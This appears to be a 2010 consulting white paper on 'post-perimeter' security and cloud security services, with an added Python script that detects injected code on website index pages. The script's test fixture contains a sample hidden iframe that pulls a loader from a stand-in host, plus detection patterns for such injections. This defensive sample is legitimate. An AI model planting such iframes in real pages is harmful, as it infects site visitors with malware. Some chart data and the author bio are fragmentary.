CLYDE CONSULTING
October 2010
Beyond the Wall: Security in a Post-Perimeter World
Walls have served multiple purposes throughout history. The Great Wall of China
defended against invaders, while the Berlin Wall kept citizens from freely traveling
beyond the control of their rulers.
Network security relies on similar premises. For years network security professionals
touted "perimeter security" as the primary solution to keep the bad guys out and
the good guys in. However, just as guns and air attacks overcame protective walls,
changes in malware attacks have rendered network firewalls and perimeter-centric
security an ineffective defense on their own. Simultaneously, the increasingly mobile workforce
makes an on-premises approach even more futile. Walls can no longer keep the bad
guys out, nor can they keep the good guys in.
[Chart: yearly values plotted on a 2002-2009 axis; seven values recovered from the extraction: 19,159; 74,981; 113,081; 167,069; 708,742; 1,691,323; 2,895,802. Source: Internet Security Threat Report, Symantec, April 2010]
When a keylogger finds its way onto an employee's laptop while it is outside the wall of the corporate network, it can
gather login information for Customer Relationship Management (CRM) and Human Resources (HR) applications. Then
the bad guys don't need to hack in to steal valuable customer billing data or employee personal data, because they already
have the keys to open the door. As a result, the market to buy and sell logins and passwords continues to grow.
FIGURE 3
In this case and others like it, the bad guys start by using a keylogger to steal the credentials of the administrator
of a legitimate Web site. Here, a keylogger found its way onto a friend's laptop, and when the Web site administrator
used that laptop to log in to do his job, his FTP login credentials were captured and later sold on the black market.
After being purchased, the compromised credentials were inserted into another malicious program that systematically
logs into sites, identifies HTML files with "index" or "default" in the name, and replaces them with another piece of malicious
code that loads a keylogger onto the computer of anyone who visits the Web page.
FIGURE 4
[Diagram of the attack cycle. Labels: Keylogger; Adding malware; Malware infects users who visit the site; Webmaster; Beefmaster; Removing malware. Source: Webroot]
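The page-replacement step is the one a webmaster can check for directly, and it is worth showing what that check looks like. The following is an added example, not code from this paper or from Webroot: a Python integrity check that records hashes of a site's index/default pages after a clean deployment and, on rescan, flags pages whose hash changed or that contain the hidden-iframe and content-after-</html> patterns typical of this kind of injection. The sample pages, the loader host (loader.invalid) and the file-name rule are constructed for the example.

```python
"""Integrity check for the index/default pages an FTP-credential thief rewrites.
Added example; not code from the paper or from Webroot."""
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed sample pages (not real infected content). INFECTED_PAGE mirrors
# the pattern the paper describes: the legitimate page plus injected code that
# pulls a loader from elsewhere, appended after the closing </html> tag.
CLEAN_PAGE = "<html><body><h1>Welcome</h1></body></html>\n"
INJECTED_TAG = ('<iframe src="http://loader.invalid/k.php" width="0" height="0" '
                'style="visibility:hidden"></iframe>\n')
INFECTED_PAGE = CLEAN_PAGE + INJECTED_TAG

# Assumed file-name rule: HTML files with "index" or "default" in the name,
# the files the paper says the malicious program goes after.
NAME_HINT = re.compile(r"index|default", re.IGNORECASE)
HTML_SUFFIXES = {".html", ".htm"}
# Zero-size or hidden iframes are the classic drive-by injection.
HIDDEN_IFRAME = re.compile(
    r"""<iframe[^>]*(?:width\s*=\s*["']?0\b|height\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden)""",
    re.IGNORECASE,
)
# Anything other than whitespace after </html> is not how a webmaster writes a page.
TRAILING_CONTENT = re.compile(r"</html>\s*\S", re.IGNORECASE)


def target_files(root: Path):
    """Return the index/default HTML pages under root, sorted for stable output."""
    return sorted(
        p for p in root.rglob("*")
        if p.is_file() and p.suffix.lower() in HTML_SUFFIXES and NAME_HINT.search(p.name)
    )


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(root: Path) -> dict:
    """Record hashes of known-good pages; run this right after a clean deployment."""
    return {str(p.relative_to(root)): sha256_of(p) for p in target_files(root)}


def scan(root: Path, baseline: dict) -> dict:
    """Return {relative_path: [findings]} for pages that changed or look injected."""
    findings = {}
    for p in target_files(root):
        rel = str(p.relative_to(root))
        text = p.read_text(errors="replace")
        hits = []
        if baseline.get(rel) != sha256_of(p):
            hits.append("hash_mismatch" if rel in baseline else "not_in_baseline")
        if HIDDEN_IFRAME.search(text):
            hits.append("hidden_iframe")
        if TRAILING_CONTENT.search(text):
            hits.append("content_after_html")
        if hits:
            findings[rel] = hits
    return findings


def demo() -> dict:
    """Deploy a clean site, baseline it, simulate the FTP defacement, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text(CLEAN_PAGE)
        (root / "about.html").write_text(CLEAN_PAGE)  # not an index/default page
        baseline = build_baseline(root)
        assert scan(root, baseline) == {}  # clean site: nothing to report
        (root / "index.html").write_text(INFECTED_PAGE)  # what the bot does
        (root / "about.html").write_text(INFECTED_PAGE)  # outside the rule, not scanned
        return scan(root, baseline)


if __name__ == "__main__":
    for page, hits in demo().items():
        print(page, ", ".join(hits))
```

The hash comparison is the reliable part: it catches any rewrite, including injections that use none of the two textual patterns. The pattern checks only add a hint about what changed, and the baseline has to be rebuilt whenever the webmaster legitimately republishes a page.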
While some people may not be aware of specific stories like this one, most do have a general sense that these threats
are real and growing. InformationWeek Analytics’ Strategic Security Survey found that a majority of companies
surveyed expect a security breach in the next year. Among companies with fewer than 1,000 employees, 84 percent
of respondents state that malware is the most likely security breach they will face. Almost half also think a Web or
application exploit will breach security. Respondents to the same survey identified the serious risks associated with
these breaches, such as network or application downtime, and theft of valuable information.
[Chart: breach types respondents expect, 2010 / 2009: Phishing 56% / 41%; Operating system vulnerabilities attacked 52% / 48%; Web or software applications exploited 44% / N/A; Denial of service 25% / 29%; other categories shown: Malware (viruses, worms, botnets), Identity theft 34%, Legal liability 34%. Source: Strategic Security Survey, InformationWeek Analytics, May 2010]
© 2010 Clyde Consulting, LLC
The Good Guys Are Getting Out
The ever-growing number of assaults via malware and exploits is only part of the challenge facing companies today.
An even bigger dilemma is protecting corporate data against these assaults in a world of mobile employees.
The era of the walled cities didn't end simply because their ability to protect diminished. Many rulers found that over
time their people refused to live behind a wall. The human desire to not be captive is powerful. Likewise, employees
want to be free: free to work from anywhere, and free to use whatever devices they want to access work files and data.
The days of only company-issued assets connecting to secure parts of the IT infrastructure are gone.
According to International Data Corp (IDC), more than one billion non-PC mobile devices will access the Internet
in 2010. In keeping with that trend, IDC reports that "mobility" is cited as the number one factor driving increased
security spending. IT security professionals are realizing how challenging it is to protect employees who are outside
the perimeter.
Regardless of the security challenges associated with mobile workers, employees are committed to working from
outside the perimeter. Recent research sponsored by Unisys and conducted by IDC found that 75 percent of
“information workers” are willing to pay at least part of the cost of IT tools in order to be able to use what they
want. This “consumerization” of IT raises some new and unique concerns for maintaining security and managing
corporate IT infrastructure.
[Chart: percentages by technology: Laptop 61%; Text or IM 47%; GPS 38%; Professional social networks 36%. Source: A Consumer Revolution in the Enterprise, IDC, sponsored by Unisys, June 2010]
IDC expects the percentage of workers using smart phones and social networking to double, from
approximately 40 percent to almost 80 percent, by 2013. In addition to the increased number of consumer devices
accessing company networks, many interactive Web applications are being used via corporate network connections.
The explosion of Web applications and software-as-a-service (SaaS) means that employees using any Internet
connected device anywhere in the world can access vital business applications with just a login. This trend towards
anywhere-and-everywhere computing is fueling a shift away from software sold as a packaged product. IDC expects
that by 2012, less than 15 percent of new software firms will ever ship a packaged product (CD). Tied to this, IDC
predicts continued growth in the SaaS market. IDC estimates that the SaaS market reached $13.1 billion in revenue
in 2009, and will grow to $40.5 billion by 2014—a compound annual growth rate (CAGR) of just over 25 percent.
This is the post-perimeter world. No longer can an artificial wall separate business and personal use of devices,
Web sites, social networks, and other tools. Businesses need to embrace this new paradigm by:
• providing solid security at the point that users connect to business applications
• ensuring valuable data is protected
• constantly updating device-level protection.
[Chart: consumer technologies used by workers, plotted on a 0-120 scale by category: Web email; shared docs; browsing; text or IM; audio; Internet messaging; Google Apps; Internet video; professional networking; phone; blogs/wikis; video streaming; YouTube; Twitter. Source: A Consumer Revolution in the Enterprise, IDC, sponsored by Unisys, June 2010]
GLBA
  What it is: Gramm-Leach-Bliley Act
  What it does: Requires financial institutions to safeguard customers' personal financial information, including protecting it (in practice, by encryption) when it is sent across the Internet
  Who it impacts most: Finance industry
DPA
  What it is: Data Protection Act 1998 (UK)
  What it does: Protects people's personal information by imposing legal obligations on anyone processing personal data
  Who it impacts most: UK companies that handle personal data (the EU Data Protection Directive imposes similar obligations across Europe)
SOX
  What it is: Sarbanes-Oxley Act
  What it does: Protects shareholders and the general public from accounting errors and scandals by imposing auditing, internal-control and record-retention requirements on public companies (audit records must be kept for at least 7 years)
  Who it impacts most: Finance industry; public companies that register their shares for sale on a US stock exchange
FRCP
  What it is: Federal Rules of Civil Procedure
  What it does: Governs discovery in US federal civil cases, requiring parties to preserve electronically stored records and produce them within a set amount of time
  Who it impacts most: Any business that may become involved in a US federal court case
FOIA
  What it is: Freedom of Information Acts (US and UK)
  What it does: Gives the public the right to request copies of records that government bodies are holding
  Who it impacts most: UK and US government organizations
HIPAA
  What it is: Health Insurance Portability and Accountability Act
  What it does: Ensures the privacy and confidentiality of patients' healthcare information
  Who it impacts most: Healthcare industry
PCI-DSS
  What it is: Payment Card Industry Data Security Standard
  What it does: Enforces global standards to protect credit card data against theft and fraud
  Who it impacts most: Anyone that handles payment card transactions
CIPA
  What it is: Children's Internet Protection Act
  What it does: Prevents access to offensive Internet content on school and library computers
  Who it impacts most: Education industry
Source: Webroot
These well-intentioned efforts can place additional burdens on companies to ensure regulatory compliance in their
approach to information security. Staying ahead of malware attacks and securing a mobile workforce to protect
valuable data and ensure regulatory compliance is a tall order for even the largest IT security department. For many
small- and medium-sized businesses, the challenge often is insurmountable.
The benefits of moving security to the cloud are not merely speculative. In a global study commissioned by Webroot, Web
security professionals in Australia, the United Kingdom, and the United States identified simplicity, effectiveness, and
blocking access to inappropriate sites as the top three reasons for adopting security SaaS.
The Forrester paper “Real-World Insights into SaaS Implementation Success” summarizes the experiences of clients
who have completed SaaS implementations. The proven SaaS benefits discussed in the report are:
• Speed to deploy
• Responsive service from vendor
• Lower costs
• Faster deployment of latest innovations
• Easy-to-use interfaces
• Security
It's noteworthy that security is included on the list of benefits, given that it often is identified as a top concern for those
considering a SaaS purchase. However, customers who have implemented SaaS affirm that it offers a superior security
option. The Forrester study confirms this:
"The majority of the customers we interviewed revealed that their SaaS vendors were doing more to secure their data than their
own IT departments could do. One reference said, 'Our greatest fear became our biggest confidence.'"
FIGURE 10
[Diagram contrasting the perimeter model with the post-perimeter model. Labels: Web surfing; Facebook; hosted e-mail; Twitter; ERP; CRM; external storage devices; consumer IT; company computers; IT infrastructure. Panels: Perimeter; Post-perimeter]
Gartner predicts that by 2012, 20 percent of businesses will own no IT assets. According to Gartner, "Several inter-related
trends are driving the movement toward decreased IT hardware assets, such as virtualization, cloud-enabled
services, and employees running personal desktops and notebook systems on corporate networks." This trend will
also make Virtual Private Networks (VPNs) obsolete.
This means a field-leveling opportunity for smaller companies that want to compete with larger companies. No longer
will they need to invest in a hardware-intensive infrastructure. Start-up companies should be selecting SaaS solutions
instead of shopping for servers. Established small- and medium-sized businesses should retire application software
along with the server it is housed upon and migrate to a SaaS security solution.
For larger companies, server consolidation efforts can be accelerated to lower overhead. SaaS means they too can gain
efficiencies and eliminate hardware and maintenance costs.
What’s Next?
In the coming years, expect to see virtually every aspect of IT security transition to the cloud. IDC’s “Worldwide
Security SaaS Forecast by Market” details the growth they predict in the various security segments during the next
several years.
[Chart: IDC Worldwide Security SaaS Forecast by Market, 2008-2013, revenue ($0 to $2,000M) by segment: messaging security; Web security; endpoint security; network security; identity and access management. Source: IDC, March 2010]
The faster companies adapt to this new post-perimeter world and seek security solutions that do not rely on antivirus
signatures as their primary means of protection, the faster they can secure valuable information.
In order to take advantage of this trend, companies should seek a security SaaS vendor that provides the following:
1. Cloud-centric solution that offers superior protection for mobile workers. This means it runs primarily in the cloud
while still providing the necessary endpoint protection.
2. Scalable cloud service to grow with the business. This will reduce implementation costs and simplify
ongoing management.
3. Complete SaaS solution that includes both e-mail and Web protection. This ensures that valuable company
data is secured.
4. Innovative technical approach based on pro-active protection that is not merely signature-based. This
extends protection to attacks for which no signature exists yet, not only the ones already catalogued.
The Great Wall of China and the site of the Berlin Wall are certainly worth a visit, but their utility to protect and
contain has ceased. The day is fast approaching when out-dated network firewalls and extraneous servers can be sent
off to the “Perimeter-Security Museum.”
An Internet security pioneer and innovator, he is credited with the creation of the first commercial intrusion detection system.
He is a Certified Information Security Manager and a founding board member of both SAFECode and the IT-ISAC. In 2010,
Rob received the coveted Joseph J. Wasserman award from the New York Metro Chapter of the Information Systems Audit and
Control Association (ISACA).
Sources
Forrester Research, "Real-World Insights Into SaaS Implementation Success", May 2010
IDC, sponsored by Unisys, "A Consumer Revolution In The Enterprise", June 2010
Open Security Foundation, Data Loss Database, 2009 yearly report, datalossdb.org